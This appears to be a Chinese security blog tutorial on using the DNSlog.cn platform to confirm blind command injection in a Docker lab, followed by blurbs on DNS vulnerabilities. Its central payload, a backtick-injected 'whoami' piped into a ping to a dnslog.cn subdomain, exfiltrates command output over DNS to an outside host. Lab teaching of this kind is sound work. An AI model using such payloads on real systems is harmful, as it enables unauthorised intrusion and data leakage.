<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    通過DNSLOG回顯驗證漏洞

    一顆小胡椒2022-07-20 10:06:20

    前言

    實際滲透測試中,有些漏洞因為沒有回顯導致無法準確判斷漏洞是否存在,可能導致滲透測試人員浪費大量精力在一個并不存在的漏洞上,因此為了驗證一些無回顯漏洞,可結合DNSlog平臺進行測試,本文使用的DNSlog平臺鏈接如下://dnslog.cn/

    原理

    DNSlog檢測原理在此就不多贅述了,網上相關資料鋪天蓋地,此處引用一張FREEBUF的圖用以說明,此圖現在看不懂沒關系,當做完實驗后再返回查看本圖思維就會很清晰了。

    環境搭建

    1. 安裝Docker

    接下來直接搭建靶場,進入實驗環境,本實驗使用Docker搭建漏洞環境,操作系統是windows 10,Docker Desktop提供了較為完善的圖形化操作界面,且兼容性隨著版本更新目前已經與linux下運行的Docker無區別,安裝方式見官網,安裝操作較為簡單,無腦下一步即可,安裝完成后需要重啟,接著按照說明一步步安裝其他必備環境,這里就不再細說了。

    2.拉取鏡像


    • 打開CMD/PowerShell運行以下命令:docker pull ge592555078/lkwa從倉庫拉取鏡像
    • 接著打開Docker Desktop按照下圖操作運行剛才拉取的環境,并將80端口映射到本地的81端口

    // 或者在命令行中直接輸入docker run -d -p 81:80 ge592555078/lkwa

    • 此時訪問//localhost:81/應當出現apache的默認頁面,證明環境搭建完成:

    漏洞復現

    由于主要學習dnslog的使用,我們就用環境中命令執行模塊復現。

    1. 訪問//localhost:81/index.php此為漏洞環境的主頁
    2. 左側選擇Bind RCE命令注入環境
    3. 此時訪問dnslog平臺://dnslog.cn/點擊頁面上Get SubDomain生成專屬子域名

    1. 回到漏洞環境,在右側命令執行輸入框中輸入如下命令之后點擊submit按鈕提交執行。(whoami后應該銜接剛才生成的對應子域名)
    ping `whoami`.cp2wj5.dnslog.cn
    
    1. 再返回DNSlog平臺,點擊刷新解析記錄按鈕,可以發現whoami的執行結果已經拼接成四級域名了

    至此為止試驗結束。

    分析總結

    存在無回顯漏洞的主機訪問DNSlog平臺就會留下DNS解析記錄,可以通過DNS解析記錄查看最終的執行結果,如示例中的語句:

    ping `whoami`.cp2wj5.dnslog.cn
    此語句實際上是:
    ping www-data.yafjqc.dnslog.cn
    

    包圍著whoami的符號是反單引號,是shift+~組合打出來的符號,表示執行命令的意思,那么最終ping的結果就是ping whoami執行后的主機名.隨機三級域名.dnslog.cn,解析的時候一層一層的迭代解析,最終指向dnslog.cn服務器上你的專屬三級域名,并附帶上執行結果(四級域名),那么此時看dnslog服務器的DNS解析記錄即可查看whoami的執行結果,如果對DNS協議不清楚此時應先去學習DNS解析原理,不然此篇文章學習起來較為吃力。

    漏洞dns
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    dnslog.link,命令執行漏洞的時候搞起ls命令記錄起來很利索,比dnslog.cn快
    對于公益SRC來說,想要沖榜就不能在一個站上浪費大量時間,公益SRC對洞的質量要求不高,所以只要 花時間,還是可以上榜的。在對某站點進行測試SQL注入的時候,先通過一些方式測試是否可能存在漏洞,然后可以直接sqlmap一把梭,也可以手工測試,然后提交漏洞。任意注冊算是低危漏洞,不過也有兩分。不管是進行SRC漏洞挖掘,還是做項目進行滲透測試,又或者是打紅藍對抗,一定要做好信息收集。
    一種涉及使用特定名稱注冊域的新域名系統 (DNS) 攻擊方法可用于研究人員所描述的“國家級間諜活動”。
    開源軟件Dnsmasq的七個缺陷可能會導致DNS緩存中毒攻擊和遠程執行代碼。研究人員發現了dnsmasq中存在的一系列缺陷,該軟件用于緩存家用和商用路由器和服務器的域名系統響應。如果加以利用,則這些缺陷可以鏈接在一起,以允許遠程執行代碼,拒絕服務和其他攻擊。研究人員將這組漏洞標記為“ DNSpooq”,這是DNS欺騙,“網絡流量的詭異間諜”概念和dnsmasq末尾的“ q”的組合。
    近日,網絡安全研究人員發現了一個可導致全球互聯網癱瘓的名為KeyTrap的嚴重漏洞。該漏洞隱藏在域名系統安全擴展(DNSSEC)功能中,可被攻擊者利用發動DoS攻擊,長時間阻斷應用程序訪問互聯網。
    據悉,uClibc庫域名系統(DNS)組件中的一個漏洞影響了數百萬的物聯網設備。 全球工業網絡安全領域領導者Nozomi Networks警告說,大量物聯網產品使用的uClibc庫域名系統(DNS)組件中存在漏洞,被追蹤為CVE-2022-05-02。該漏洞還影響所有版本的uClibc-ng庫的域名系統(DNS),uClibc-ng庫是專門為關鍵基礎設施部門路由器的通用操作系統OpenWRT設計
    安全專家披露了九個漏洞,這些漏洞被統一稱為NAME:WRECK,影響了流行的TCP / IP網絡通信堆棧中DNS協議的實現。安全公司Forescout和以色列安全研究小組JSOF的研究人員發現了這些漏洞。“這些堆棧的廣泛使用以及易受攻擊的DNS客戶端的外部暴露通常會大大增加攻擊面。”研究人員將分析重點放在DNS協議的“消息壓縮”功能及其在TCP / IP堆棧上的實現。閱讀研究人員發表的報告。研究人員進行的研究提供了有關漏洞利用的技術細節。
    Log4j漏洞的深度回顧
    2022-03-30 12:17:25
    Log4Shell 是針對 Log4j 的漏洞利用,Log4j 是 Java 社區開發人員常用的開源日志庫,為錯誤消息、診斷信息等的日志記錄提供框架。 Log4j 存在于世界各地公司使用的產品中,也包括許多中國的組織。
    漏洞可以潛伏在產品代碼中長達數年甚至數十年,攻擊隨時都會降臨。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类